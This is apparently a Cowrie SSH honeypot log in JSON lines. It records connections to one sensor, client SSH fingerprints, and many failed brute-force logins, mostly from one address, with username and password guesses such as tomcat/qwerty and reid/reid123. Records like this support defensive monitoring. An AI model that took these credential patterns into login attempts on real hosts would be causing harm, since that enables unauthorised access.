{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"bf:85:8e:32:be:27:68:5f:22:f9:63:eb:9b:e3:c0:5d","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint bf:85:8e:32:be:27:68:5f:22:f9:63:eb:9b:e3:c0:5d","sensor":"my-vps","timestamp":"2025-08-28T12:51:00.304585Z","src_ip":"212.227.235.229","session":"b163472f5520"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"bf:85:8e:32:be:27:68:5f:22:f9:63:eb:9b:e3:c0:5d","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T12:51:00.305239Z","src_ip":"212.227.235.229","session":"b163472f5520"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:51:09.945738Z","src_ip":"212.227.235.229","session":"b163472f5520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49360,"dst_ip":"1.2.3.4","dst_port":22,"session":"be9fb124162b","protocol":"ssh","message":"New connection: 212.227.125.160:49360 (1.2.3.4:22) [session: be9fb124162b]","sensor":"my-vps","timestamp":"2025-08-28T12:51:21.554462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:51:21.556450Z","src_ip":"212.227.125.160","session":"be9fb124162b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:51:21.730518Z","src_ip":"212.227.125.160","session":"be9fb124162b"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"12345678","message":"login attempt [tomcat/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:51:22.250899Z","src_ip":"212.227.125.160","session":"be9fb124162b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:51:23.447447Z","src_ip":"212.227.125.160","session":"be9fb124162b"}
{"eventid":"cowrie.session.connect","src_ip":"45.79.38.219","src_port":45230,"dst_ip":"1.2.3.4","dst_port":22,"session":"3372aa184f82","protocol":"ssh","message":"New connection: 45.79.38.219:45230 (1.2.3.4:22) [session: 3372aa184f82]","sensor":"my-vps","timestamp":"2025-08-28T12:51:48.931879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:51:48.933017Z","src_ip":"45.79.38.219","session":"3372aa184f82"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T12:51:49.064675Z","src_ip":"45.79.38.219","session":"3372aa184f82"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:51:49.198170Z","src_ip":"45.79.38.219","session":"3372aa184f82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52594,"dst_ip":"1.2.3.4","dst_port":22,"session":"58917262f9a4","protocol":"ssh","message":"New connection: 212.227.125.160:52594 (1.2.3.4:22) [session: 58917262f9a4]","sensor":"my-vps","timestamp":"2025-08-28T12:52:06.033029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:52:06.034345Z","src_ip":"212.227.125.160","session":"58917262f9a4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:52:06.201923Z","src_ip":"212.227.125.160","session":"58917262f9a4"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"qwerty","message":"login attempt [tomcat/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:52:06.708471Z","src_ip":"212.227.125.160","session":"58917262f9a4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:52:07.878294Z","src_ip":"212.227.125.160","session":"58917262f9a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37598,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb56dca2d81f","protocol":"ssh","message":"New connection: 212.227.125.160:37598 (1.2.3.4:22) [session: eb56dca2d81f]","sensor":"my-vps","timestamp":"2025-08-28T12:52:10.500306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:52:10.501202Z","src_ip":"212.227.125.160","session":"eb56dca2d81f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T12:52:10.561803Z","src_ip":"212.227.125.160","session":"eb56dca2d81f"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"solana","message":"login attempt [ubuntu/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T12:52:10.742368Z","src_ip":"212.227.125.160","session":"eb56dca2d81f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56680,"dst_ip":"1.2.3.4","dst_port":22,"session":"a881a7533121","protocol":"ssh","message":"New connection: 217.72.205.35:56680 (1.2.3.4:22) [session: a881a7533121]","sensor":"my-vps","timestamp":"2025-08-28T12:52:10.870604Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:52:10.871866Z","src_ip":"217.72.205.35","session":"a881a7533121"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:52:11.804655Z","src_ip":"212.227.125.160","session":"eb56dca2d81f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49532,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ce480ec29d6","protocol":"ssh","message":"New connection: 212.227.125.160:49532 (1.2.3.4:22) [session: 9ce480ec29d6]","sensor":"my-vps","timestamp":"2025-08-28T12:52:51.065818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:52:51.071965Z","src_ip":"212.227.125.160","session":"9ce480ec29d6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:52:51.238389Z","src_ip":"212.227.125.160","session":"9ce480ec29d6"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123123","message":"login attempt [tomcat/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:52:52.111019Z","src_ip":"212.227.125.160","session":"9ce480ec29d6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:52:53.287346Z","src_ip":"212.227.125.160","session":"9ce480ec29d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48140,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ec49b1354ea","protocol":"ssh","message":"New connection: 212.227.125.160:48140 (1.2.3.4:22) [session: 5ec49b1354ea]","sensor":"my-vps","timestamp":"2025-08-28T12:53:33.095060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:53:33.183110Z","src_ip":"212.227.125.160","session":"5ec49b1354ea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:53:33.361195Z","src_ip":"212.227.125.160","session":"5ec49b1354ea"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"111111","message":"login attempt [tomcat/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:53:33.945792Z","src_ip":"212.227.125.160","session":"5ec49b1354ea"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:53:35.115552Z","src_ip":"212.227.125.160","session":"5ec49b1354ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62895,"dst_ip":"1.2.3.4","dst_port":22,"session":"357aebcdbf17","protocol":"ssh","message":"New connection: 212.227.125.160:62895 (1.2.3.4:22) [session: 357aebcdbf17]","sensor":"my-vps","timestamp":"2025-08-28T12:53:49.853195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:53:49.854085Z","src_ip":"212.227.125.160","session":"357aebcdbf17"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:53:49.965481Z","src_ip":"212.227.125.160","session":"357aebcdbf17"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid","message":"login attempt [reid/reid] failed","sensor":"my-vps","timestamp":"2025-08-28T12:53:51.059070Z","src_ip":"212.227.125.160","session":"357aebcdbf17"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid1","message":"login attempt [reid/reid1] failed","sensor":"my-vps","timestamp":"2025-08-28T12:53:52.172365Z","src_ip":"212.227.125.160","session":"357aebcdbf17"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid123","message":"login attempt [reid/reid123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:53:53.285420Z","src_ip":"212.227.125.160","session":"357aebcdbf17"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid1234","message":"login attempt [reid/reid1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:53:54.401612Z","src_ip":"212.227.125.160","session":"357aebcdbf17"}
{"eventid":"cowrie.login.failed","username":"reid","password":"reid12345","message":"login attempt [reid/reid12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:53:55.845503Z","src_ip":"212.227.125.160","session":"357aebcdbf17"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:53:56.967916Z","src_ip":"212.227.125.160","session":"357aebcdbf17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56644,"dst_ip":"1.2.3.4","dst_port":22,"session":"c240839869a2","protocol":"ssh","message":"New connection: 212.227.125.160:56644 (1.2.3.4:22) [session: c240839869a2]","sensor":"my-vps","timestamp":"2025-08-28T12:54:14.267022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:54:14.268268Z","src_ip":"212.227.125.160","session":"c240839869a2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:54:14.433617Z","src_ip":"212.227.125.160","session":"c240839869a2"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"1234567","message":"login attempt [tomcat/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:54:15.014535Z","src_ip":"212.227.125.160","session":"c240839869a2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:54:16.182098Z","src_ip":"212.227.125.160","session":"c240839869a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46918,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bc5ba0ffcde","protocol":"ssh","message":"New connection: 212.227.125.160:46918 (1.2.3.4:22) [session: 7bc5ba0ffcde]","sensor":"my-vps","timestamp":"2025-08-28T12:54:54.310097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:54:54.318129Z","src_ip":"212.227.125.160","session":"7bc5ba0ffcde"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:54:54.482397Z","src_ip":"212.227.125.160","session":"7bc5ba0ffcde"}
